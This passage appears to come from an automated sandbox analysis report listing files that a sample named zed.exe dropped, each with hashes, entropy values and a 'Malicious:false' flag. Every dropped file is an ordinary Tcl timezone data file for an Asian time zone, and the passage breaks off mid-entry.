                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Seoul) {.. {-9223372036854775808 30472 0 LMT}.. {-1948782472 30600 0 KST}.. {-1830414600 32400 0 JST}.. {-767350800 32400 0 KST}.. {-681210000 36000 1 KDT}.. {-672228000 32400 0 KST}.. {-654771600 36000 1 KDT}.. {-640864800 32400 0 KST}.. {-623408400 36000 1 KDT}.. {-609415200 32400 0 KST}.. {-588848400 36000 1 KDT}.. {-577965600 32400 0 KST}.. {-498128400 30600 0 KST}.. {-462702600 34200 1 KDT}.. {-451733400 30600 0 KST}.. {-429784200 34200 1 KDT}.. {-418296600 30600 0 KST}.. {-399544200 34200 1 KDT}.. {-387451800 30600 0 KST}.. {-368094600 34200 1 KDT}.. {-356002200 30600 0 KST}.. {-336645000 34200 1 KDT}.. {-324552600 30600 0 KST}.. {-305195400 34200 1 KDT}.. {-293103000 30600 0 KST}.. {-264933000 32400 0 KST}.. {547578000 36000 1 KDT}.. {560883600 32400 0 KST}.. {579027600 36000 1 KDT}.. {592333200 32400 0 KST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):981
                                                                                                                                                                                                                                            Entropy (8bit):4.16042656890735
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Te3vvZJzHjwH6kHp7FH32AzHjZBHNHlQHuHxmHUjH6zHj2HBHeC:5ovZZO7lLpT24
                                                                                                                                                                                                                                            MD5:A266AA43A84FD5E4890BC77AA4E240D0
                                                                                                                                                                                                                                            SHA1:CD88C5D451CD7D3F50C9B36FDD47C84D20377441
                                                                                                                                                                                                                                            SHA-256:3AABB42D9EFE95D906B7F34640E7815919A1A20979EBB6EC1527FCAA3B09B22A
                                                                                                                                                                                                                                            SHA-512:13AE48F58C9AF24002F0FE4F28BF96B10EE0ED293E0DE9D29BCEBAAE102B2EA818F42CA4069544A254C95444A48604EC57E6AB2BEBDA4B5E72C82B49E61AD0A0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Shanghai) {.. {-9223372036854775808 29143 0 LMT}.. {-2177481943 28800 0 CST}.. {-1600675200 32400 1 CDT}.. {-1585904400 28800 0 CST}.. {-933667200 32400 1 CDT}.. {-922093200 28800 0 CST}.. {-908870400 32400 1 CDT}.. {-888829200 28800 0 CST}.. {-881049600 32400 1 CDT}.. {-767869200 28800 0 CST}.. {-745833600 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716889600 32400 1 CDT}.. {-699613200 28800 0 CST}.. {-683884800 32400 1 CDT}.. {-670669200 28800 0 CST}.. {-652348800 32400 1 CDT}.. {-650016000 28800 0 CST}.. {515527200 32400 1 CDT}.. {527014800 28800 0 CST}.. {545162400 32400 1 CDT}.. {558464400 28800 0 CST}.. {577216800 32400 1 CDT}.. {589914000 28800 0 CST}.. {608666400 32400 1 CDT}.. {621968400 28800 0 CST}.. {640116000 32400 1 CDT}.. {653418000 28800 0 CST}.. {671565600 32400 1 CDT}.. {684867600 28800 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):372
                                                                                                                                                                                                                                            Entropy (8bit):4.436676898144829
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKfbSDm2OHxdoHvm5vWOb/MVSYyF/3MesF5XJSx0dMVSSFF8kvScHS:MB862nbGmdHDCvsvDTMsF/CFDMx/HHbe
                                                                                                                                                                                                                                            MD5:C3D13D921E4C6E475910E5080B761C32
                                                                                                                                                                                                                                            SHA1:8C5AE73C4098D03908E5D567FD7C4D827601D718
                                                                                                                                                                                                                                            SHA-256:05C76B58A4E356FD358E24FBC71FAE98DCB18C441C8D8CBB13A18D4F6E406062
                                                                                                                                                                                                                                            SHA-512:3A620597469D31577ECAAA098C95C244F0C288ABACE9E8964D8641154C1893967EFBD7211A41751D0D4CC1B0B9A2286F11738EFB7D01F110A4826BBE1844A2EA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Singapore) {.. {-9223372036854775808 24925 0 LMT}.. {-2177477725 24925 0 SMT}.. {-2038200925 25200 0 +07}.. {-1167634800 26400 1 +0720}.. {-1073028000 26400 0 +0720}.. {-894180000 27000 0 +0730}.. {-879665400 32400 0 +09}.. {-767005200 27000 0 +0730}.. {378664200 28800 0 +08}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2064
                                                                                                                                                                                                                                            Entropy (8bit):3.7913177223006698
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5HJeidmbv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKxwy:5HSv+0j6lua2Gg/3gO8UoOZU2Wc/pKf
                                                                                                                                                                                                                                            MD5:B4FA38E884A85F6BD47C8BB02BB0500C
                                                                                                                                                                                                                                            SHA1:1DD135B79CC0D81C048D7B2C6BE0CF71171DD19E
                                                                                                                                                                                                                                            SHA-256:705D6D8360C2DCD51E909E39E1910FE876145220D151031612DA36B247207395
                                                                                                                                                                                                                                            SHA-512:2D32AAAF1BCC865B5F2810BFE0FB82BE98140BB5F2ECA1DA7FD148A3074DA127B81242F17B8BA9C9E259B61CBB123FD1513CCE6A85C8D7679ADFC0D689B552BB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Srednekolymsk) {.. {-9223372036854775808 36892 0 LMT}.. {-1441188892 36000 0 +10}.. {-1247565600 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1344
                                                                                                                                                                                                                                            Entropy (8bit):4.062084847879695
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5X2eIvZPzGzHjZBHNHlQHKn3HnHNd9HiHkHBHaHLHMtyH9Qm+zHFOzHZ32HZvHiR:5Xi1ypBvt1mwO3Kq46T
                                                                                                                                                                                                                                            MD5:AECA800C8F2A679D0B19E5BB90AFD858
                                                                                                                                                                                                                                            SHA1:2C7DCEB709F9A4312C511971FE1E6A9DC1FBD0E8
                                                                                                                                                                                                                                            SHA-256:389C9D3EE2970665D0D8C5CB61B8B790C5FBDDC0DF0BF2B9753046F5953A477F
                                                                                                                                                                                                                                            SHA-512:C2D6BB4FEB5848D0704647D26F94C0BD8CD7E834AA2187EC9C877E80157E9CC225BBA3BECEE0148894C8639105D292AB50EE95830992BF357C632ACF001E020F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Taipei) {.. {-9223372036854775808 29160 0 LMT}.. {-2335248360 28800 0 CST}.. {-1017820800 32400 0 JST}.. {-766224000 28800 0 CST}.. {-745833600 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716889600 32400 1 CDT}.. {-699613200 28800 0 CST}.. {-683884800 32400 1 CDT}.. {-670669200 28800 0 CST}.. {-652348800 32400 1 CDT}.. {-639133200 28800 0 CST}.. {-620812800 32400 1 CDT}.. {-607597200 28800 0 CST}.. {-589276800 32400 1 CDT}.. {-576061200 28800 0 CST}.. {-562924800 32400 1 CDT}.. {-541760400 28800 0 CST}.. {-528710400 32400 1 CDT}.. {-510224400 28800 0 CST}.. {-497174400 32400 1 CDT}.. {-478688400 28800 0 CST}.. {-465638400 32400 1 CDT}.. {-449830800 28800 0 CST}.. {-434016000 32400 1 CDT}.. {-418208400 28800 0 CST}.. {-402480000 32400 1 CDT}.. {-386672400 28800 0 CST}.. {-370944000 32400 1 CDT}.. {-355136400 28800 0 CST}.. {-3394080
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):878
                                                                                                                                                                                                                                            Entropy (8bit):3.9280321712564845
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5geQqdNRvOt81FCuLqecDngO6jPvTpYy5T4TXvKT10Sv6r:5+EvdJqxiF0rvK50Sv6r
                                                                                                                                                                                                                                            MD5:DB59DB8E401E12917B7367D5604D3DE6
                                                                                                                                                                                                                                            SHA1:7CC7C5C1DB551BD381B833C81746201D36BC59A9
                                                                                                                                                                                                                                            SHA-256:4445F3F892C7267A6867009CC1A3F0B0548D0240408375A9D15360B28993C2A9
                                                                                                                                                                                                                                            SHA-512:2C7AE63C408A9F06F973AAC16845E1DBE92D15A421BBBE420914F21155AD5E57CD058D7E4427E43185E023D2FF475EBF9D74003ECEF004FF4E5F9D5681ADFB80
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tashkent) {.. {-9223372036854775808 16631 0 LMT}.. {-1441168631 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {694206000 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1729
                                                                                                                                                                                                                                            Entropy (8bit):3.6815162494646034
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5yBeqvIdZlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPqUsx9Ul4N:5MmsUf8mFpNWFnytO6VnYK
                                                                                                                                                                                                                                            MD5:C376C9ED66F6CC011E063D3E8E0DCED1
                                                                                                                                                                                                                                            SHA1:13C6345F8CB0EC79FE7C78B156C5737BCB66E49E
                                                                                                                                                                                                                                            SHA-256:B637BB0E49144C717E99E93540CB2C4D3695D63B91FE42547F2F0AA006498693
                                                                                                                                                                                                                                            SHA-512:FD60192CBEDC91C5D6B3B5E6F19DEDCAE14DCF48DCAE6D4865A8F0BBDC01CBF8DAAE92C4C46C353AF5B3EEE36CCC87B23F193DDF221132F5404C42507B708364
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tbilisi) {.. {-9223372036854775808 10751 0 LMT}.. {-2840151551 10751 0 TBMT}.. {-1441162751 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {694213200 10800 0 +03}.. {701816400 14400 1 +03}.. {717537600 10800 0 +03}.. {733266000 14400 1 +03}.. {748
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2354
                                                                                                                                                                                                                                            Entropy (8bit):3.666553647637418
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Z2eendFalxbr1p4USUcESUUxSuEqzSUUongA3jJW3eY37U8uuZrc3cNWH1/ANzx:54G9SOSWzx1qcK83kv3OR0xV1ox
                                                                                                                                                                                                                                            MD5:A7A174A14E51E0ACD7092D2A5AA50F99
                                                                                                                                                                                                                                            SHA1:69ADDDDB68084B90819AD49A5230D5B0E1A9CD85
                                                                                                                                                                                                                                            SHA-256:25870503A8A679DA13B98117BD473EAA0C79B094B85D3AD50629FF0946D5EACE
                                                                                                                                                                                                                                            SHA-512:1ECFB558B13C94BDC848E7BBBB0CA1BB854BB12E112EBF306045EC14F00CE3E3C2DA51EBA8AF2D63C95D71B945647C3D9E9881158FE128DEBE940A742C4BFEB1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tehran) {.. {-9223372036854775808 12344 0 LMT}.. {-1704165944 12344 0 TMT}.. {-1090466744 12600 0 +0330}.. {227820600 16200 1 +0330}.. {246227400 14400 0 +04}.. {259617600 18000 1 +04}.. {271108800 14400 0 +04}.. {283982400 12600 0 +0330}.. {296598600 16200 1 +0330}.. {306531000 12600 0 +0330}.. {322432200 16200 1 +0330}.. {338499000 12600 0 +0330}.. {673216200 16200 1 +0330}.. {685481400 12600 0 +0330}.. {701209800 16200 1 +0330}.. {717103800 12600 0 +0330}.. {732745800 16200 1 +0330}.. {748639800 12600 0 +0330}.. {764281800 16200 1 +0330}.. {780175800 12600 0 +0330}.. {795817800 16200 1 +0330}.. {811711800 12600 0 +0330}.. {827353800 16200 1 +0330}.. {843247800 12600 0 +0330}.. {858976200 16200 1 +0330}.. {874870200 12600 0 +0330}.. {890512200 16200 1 +0330}.. {906406200 12600 0 +0330}.. {922048200 16200 1 +0330}.. {937942200 12600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.876713308636272
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq85zFFfXHAIgN0AzFFVHRL/2WFK+TT52WFKYzFgn:SlSWB9vsM3yZbPHAIgCAXRN/2wKsswKR
                                                                                                                                                                                                                                            MD5:40B15013485EE2138A3DCB915F9121E7
                                                                                                                                                                                                                                            SHA1:3ADBE38686C7CA1FDE3DDD12BE908F39BFD1E228
                                                                                                                                                                                                                                            SHA-256:07537A30E6236D9E334DAFD5C4D352D25FDEF95D6DC7496F5D93EFAB74D9EBB1
                                                                                                                                                                                                                                            SHA-512:DA3B7B44B3BEF07CA8AA5253BF684A838181D8A15D7CCF0447A6B5F5BAE28D155CF65BCFB6286EB36C0B9F4FDD1FE862A3297ADB6FC33532B9F766334283D725
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Jerusalem)]} {.. LoadTimeZoneFile Asia/Jerusalem..}..set TZData(:Asia/Tel_Aviv) $TZData(:Asia/Jerusalem)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.906503135441824
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8kNZ4WXHAIgNqFNKARL/2WFK9Z752WFKvNZovn:SlSWB9vsM3ykZ42HAIgc3KAN/2wKf126
                                                                                                                                                                                                                                            MD5:081862B6FB33389BEC9B0E6B500AA342
                                                                                                                                                                                                                                            SHA1:AF9467BB87C4C28921DF62A87B81223052F9FF4A
                                                                                                                                                                                                                                            SHA-256:37459C17B59639DF62B3F3943751902CE6AAF1F11B7630069DB45052EBEFB5B9
                                                                                                                                                                                                                                            SHA-512:CAF6F1C928528C4471229A2EF2944623545626532986628E6CE38884535286A0B38BA88C1A295E8B11322475D6BFAC61BF89786A76330C1A0C729339A3532BAF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Thimphu)]} {.. LoadTimeZoneFile Asia/Thimphu..}..set TZData(:Asia/Thimbu) $TZData(:Asia/Thimphu)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.887493603495978
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKvNZJMXGm2OHEQUTFnoHqVaJKuc/v6Q61V9gmZVFSTVV:SlSWB9eg/2wKVZJDm2OHEfnoHDKuc/SC
                                                                                                                                                                                                                                            MD5:F239452984CCA9F23E97A880652C39E6
                                                                                                                                                                                                                                            SHA1:52D25282D03B79960F152D21E7492EE26DAEBBAA
                                                                                                                                                                                                                                            SHA-256:B797C74E3840298C3CD8149FC8AA4BCE839EFE79E7C3310986FF23C965607929
                                                                                                                                                                                                                                            SHA-512:1044BEDAE04FCA7BD62937AFCE70F6C447583A90DD1596C3029A64A8251E3F73C106F4D940548DD38E895D67FEFDCD196B257E11437DEB399085EE80C345AA50
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Thimphu) {.. {-9223372036854775808 21516 0 LMT}.. {-706341516 19800 0 +0530}.. {560025000 21600 0 +06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):388
                                                                                                                                                                                                                                            Entropy (8bit):4.470556147950505
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862ymdHOx5CvAoK3zoiIxtoFDIe+zT0agbov:5yeOCvARzzCOVa/gby
                                                                                                                                                                                                                                            MD5:3CCC15B63A882DB1B7459A51CD1C8165
                                                                                                                                                                                                                                            SHA1:77A3EFE6E4EE524B9EC6F51593DD7521FD7B8DAD
                                                                                                                                                                                                                                            SHA-256:3DA522FA88541A375D53F30A0B62DC4A305FA0315FEE534B7998C9E0A239450A
                                                                                                                                                                                                                                            SHA-512:15238E96DABAB5D2B9FFD25B3F50417ED32205FA69239D6F6B28DA97A378D669FD409164964D0DD2A5B1D795C8F60E8D4EB15924046348C3D6010646A536E07C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tokyo) {.. {-9223372036854775808 33539 0 LMT}.. {-2587712400 32400 0 JST}.. {-683802000 36000 1 JDT}.. {-672310800 32400 0 JST}.. {-654771600 36000 1 JDT}.. {-640861200 32400 0 JST}.. {-620298000 36000 1 JDT}.. {-609411600 32400 0 JST}.. {-588848400 36000 1 JDT}.. {-577962000 32400 0 JST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2116
                                                                                                                                                                                                                                            Entropy (8bit):3.695316005718174
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5CeLz/XJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEno:5H040yVRB7VfXucydm4IqtTTDOS
                                                                                                                                                                                                                                            MD5:E95DE93CBCE72C5E02D7ECFE94C96308
                                                                                                                                                                                                                                            SHA1:59A49EBFE544D97545BADFEFE716BB5659C64C20
                                                                                                                                                                                                                                            SHA-256:6B64A01D0F0B5EC7A1410C3BD6883BA7CC133E9F073D40E8BFECE037E3A3FA24
                                                                                                                                                                                                                                            SHA-512:9E33DC9C1C6D60F3226263C484AF46A14AAB31F838516A0D69BA08F8F416EF10D09697E8D7ABAC1CE1F5BCE8AB0C2635D99FBE70C89ECC268DED0DCE89E67466
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tomsk) {.. {-9223372036854775808 20391 0 LMT}.. {-1578807591 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {7647084
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.897140749162557
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8pYFfXHAIgNzGRRL/2WFKPQOrFJ4WFKov:SlSWB9vsM3yWFPHAIg0RN/2wKPQOrFJD
                                                                                                                                                                                                                                            MD5:F6AE33D706C36FDD8A21F44AD59F5607
                                                                                                                                                                                                                                            SHA1:94D6EC7A437249AEBE2FA4AF8AFB029A620368C0
                                                                                                                                                                                                                                            SHA-256:732751845ACEDBFFD3C6170F4B94CB20B25BFDCFCC5EEA19F4BE439F5C5B573A
                                                                                                                                                                                                                                            SHA-512:2314AB2B154887842211C9A570BC1323D9B4375FF60C96296835DB001E8A277CA62D40B8562BC34EDDF281D96D5325640B79F7907558C6E0319C7D2A76BE239C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Makassar)]} {.. LoadTimeZoneFile Asia/Makassar..}..set TZData(:Asia/Ujung_Pandang) $TZData(:Asia/Makassar)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1590
                                                                                                                                                                                                                                            Entropy (8bit):3.7728141273024374
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5IerIvusF7cCGK6zoCjZte3kzMjsBw0oZzlL98oysHqGzJvqE+ksabzdX+YjL:5VujmUCei46oljFC67
                                                                                                                                                                                                                                            MD5:A4647294401D2B54ABAA8E509BF05A6F
                                                                                                                                                                                                                                            SHA1:BF804CC38996D7715E3BA9BAD715D7ADBED781B9
                                                                                                                                                                                                                                            SHA-256:A56A26981163A717CF388A423CFE7A2BAD1BE8652BE2E338670CBC0C0A70E5E9
                                                                                                                                                                                                                                            SHA-512:B43157FABDE016FA6636CAB7B06CC1DEA53526B42FB46BB41DC4B7E48188D191C325BEF0D170B125E885F321C4316746A8D478D798828E2DC4A51C71DA4A610C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ulaanbaatar) {.. {-9223372036854775808 25652 0 LMT}.. {-2032931252 25200 0 +07}.. {252435600 28800 0 +08}.. {417974400 32400 1 +08}.. {433782000 28800 0 +08}.. {449596800 32400 1 +08}.. {465318000 28800 0 +08}.. {481046400 32400 1 +08}.. {496767600 28800 0 +08}.. {512496000 32400 1 +08}.. {528217200 28800 0 +08}.. {543945600 32400 1 +08}.. {559666800 28800 0 +08}.. {575395200 32400 1 +08}.. {591116400 28800 0 +08}.. {606844800 32400 1 +08}.. {622566000 28800 0 +08}.. {638294400 32400 1 +08}.. {654620400 28800 0 +08}.. {670348800 32400 1 +08}.. {686070000 28800 0 +08}.. {701798400 32400 1 +08}.. {717519600 28800 0 +08}.. {733248000 32400 1 +08}.. {748969200 28800 0 +08}.. {764697600 32400 1 +08}.. {780418800 28800 0 +08}.. {796147200 32400 1 +08}.. {811868400 28800 0 +08}.. {828201600 32400 1 +08}.. {843922800 28800 0 +08}.. {859
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.728285544456033
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8TcXkXHAIgNrfcXORL/2WFKhrMEBQWFKucXB:SlSWB9vsM3yXHAIgTN/2wKhrMEewKX
                                                                                                                                                                                                                                            MD5:D2EAEA6182FB332CAA707B523F6C8A9D
                                                                                                                                                                                                                                            SHA1:3BFC654E2B3BCF902AF41AEEC46772C84FFF3890
                                                                                                                                                                                                                                            SHA-256:D17FDAF17B3DAC3A1310E2332F61585598185E64CED799ABD68249EB5B698591
                                                                                                                                                                                                                                            SHA-512:E16BEE28BFE3AFFFE6F0025C09D0D65001F38D5045AAB1B554E4D3A66A88273F985B7BAA11F8D26E76E5ABC9F559E3E4B794CC939AAD5FF012A5A47924D08CB3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ulaanbaatar)]} {.. LoadTimeZoneFile Asia/Ulaanbaatar..}..set TZData(:Asia/Ulan_Bator) $TZData(:Asia/Ulaanbaatar)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):149
                                                                                                                                                                                                                                            Entropy (8bit):5.006390440264841
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKjhfMXGm2OHEVPoHsWA0GVFSTVVn:SlSWB9eg/2wKjJDm2OHEVPoH3A0CUX
                                                                                                                                                                                                                                            MD5:D6245CAAEC9BA2579F4CEFFF196A9369
                                                                                                                                                                                                                                            SHA1:4D182953F2CEEFF3583265F977B14F40C1A2FB43
